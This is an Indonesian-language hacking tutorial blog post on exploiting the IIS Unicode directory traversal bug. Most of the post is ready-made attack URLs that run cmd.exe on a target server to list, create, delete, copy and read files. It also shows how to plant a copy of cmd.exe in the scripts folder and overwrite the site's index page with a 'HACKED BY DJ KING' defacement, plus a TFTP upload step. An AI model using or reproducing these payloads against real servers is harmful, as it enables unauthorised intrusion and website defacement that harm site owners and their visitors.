Belajar Hack Situs/Website Part 2


CARA MEMANFAATKAN IIS BUGS LEBIH DARI SATU CARA:

Bugs-bugs IIS bisa langsung kita praktekkan melalui explorer dengan memanfaatkan file cmd.exe agar semua perintah (command) yang kita minta terlaksana.

CONTOH BUGS INI DAN APLIKASI COMMAND:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

COMMAND UNTUK MEMBUAT PENUNJUK BARU:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ

COMMAND UNTUK MEN-DELETE PETUNJUK:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ

COMMAND UNTUK MENG-COPY:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

COMMAND UNTUK MENGHAPUS:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp

COMMAND UNTUK ME-RENAME FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
COMMAND UNTUK MELIHAT ISI FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm

COMMAND UNTUK MENULISKAN SESUATU DALAM FILE APA SAJA:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt

INGAT: Kadang kita perlu merubah nama petunjuk (exentition) menjadi: msadc, scripts, _vit_admin, iisadmpwd, _vti_bin, cgi-bin, .samples.

SEKARANG, UNTUK MERUBAH TAMPILAN AWAL (HOME) SEBUAH SITUS, MAKA HARUS:

• Menuliskan sesuatu pada Home dengan menggunakan perintah echo
• Meng-apload tampilan buatan Antum melalui program TFTP
• Menuliskan sesuatu pada file Home sebuah situs (file: index.html) adalah menggunakan command echo.

Sebagai dasar, Antum harus terlebih dahulu meng-copy file cmd.exe ke folder scripts, caranya seperti ini –sekedar contoh saja:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

Nah, setelah meng-copy file ini, selanjutnya bisa dilakukan pemeriksaan terhadap bugs lain yang ada di situs tersebut, caranya:
http://www.xxx.com/scripts/DJ.exe/c+dir+c:

Setelah itu, command echo baru bisa dijalankan, caranya adalah:
http://www.xxx.com/scripts/DJ.exe?/…hackermail.com+>+c:inetpubwwwrootindex.htm

CATATAN PENTING:
File indeks utama sebuah situs tidak selalunya bernama index.htm, bisa saja namanya: default.html, index.html, default.asp, default.htm. Jadi, pastikan dulu nama file indeksnya.
Tapi, biasanya index.htm lah yang sering dipakai. Ada kemungkinan juga bahwa file indeks berada di selain folder wwwroot, jadi harus dicari.

source : http://begundalmilitia88.blogspot.com/2009/10/panduan-hacker-dari-irhaby-007-5.html

Read more: http://www.safe-computing.co.cc/2010/05/panduan-hacker-dari-irhaby-007-5.html#ixzz0ri5v006g
Under Creative Commons License: Attribution Non-Commercial

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s